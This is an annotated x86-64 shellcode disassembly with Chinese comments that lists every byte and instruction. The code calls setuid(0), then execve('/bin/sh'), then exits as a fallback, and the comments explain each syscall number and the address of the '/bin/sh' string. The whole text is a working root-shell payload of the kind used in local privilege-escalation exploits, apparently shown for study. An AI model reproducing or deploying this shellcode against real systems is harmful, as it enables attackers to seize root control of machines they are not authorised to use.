; ============ setuid(0) ============0x400078: 31 c0 xor eax, eax0x40007a: 31 ff xor edi, edi ; arg0: uid = 00x40007c: b0 69 mov al, 0x69 ; syscall NR = 105 = __NR_setuid0x40007e: 0f 05 syscall ; → setuid(0),将 EUID 设为 root; ============ execve("/bin/sh", NULL, NULL) ============0x400080: 48 8d 3d lea rdi, [rip+0xf] ; rdi = 0x400096 → "/bin/sh" 0f 00 00 000x400087: 31 f6 xor esi, esi ; arg1: argv = NULL0x400089: 6a 3b push 0x3b0x40008b: 58 pop rax ; syscall NR = 59 = __NR_execve0x40008c: 99 cdq ; rdx = 0 (envp = NULL)0x40008d: 0f 05 syscall ; → execve("/bin/sh", NULL, NULL); ============ exit(0)(execve 失败时的 fallback)============0x40008f: 31 ff xor edi, edi0x400091: 6a 3c push 0x3c0x400093: 58 pop rax ; syscall NR = 60 = __NR_exit0x400094: 0f 05 syscall ; → exit(0); ============ 字符串数据 ============0x400096: 2f 62 69 6e 2f 73 68 00 "/bin/sh\0" ^ LEA target: RIP(0x400087) + 0xf = 0x400096 ✓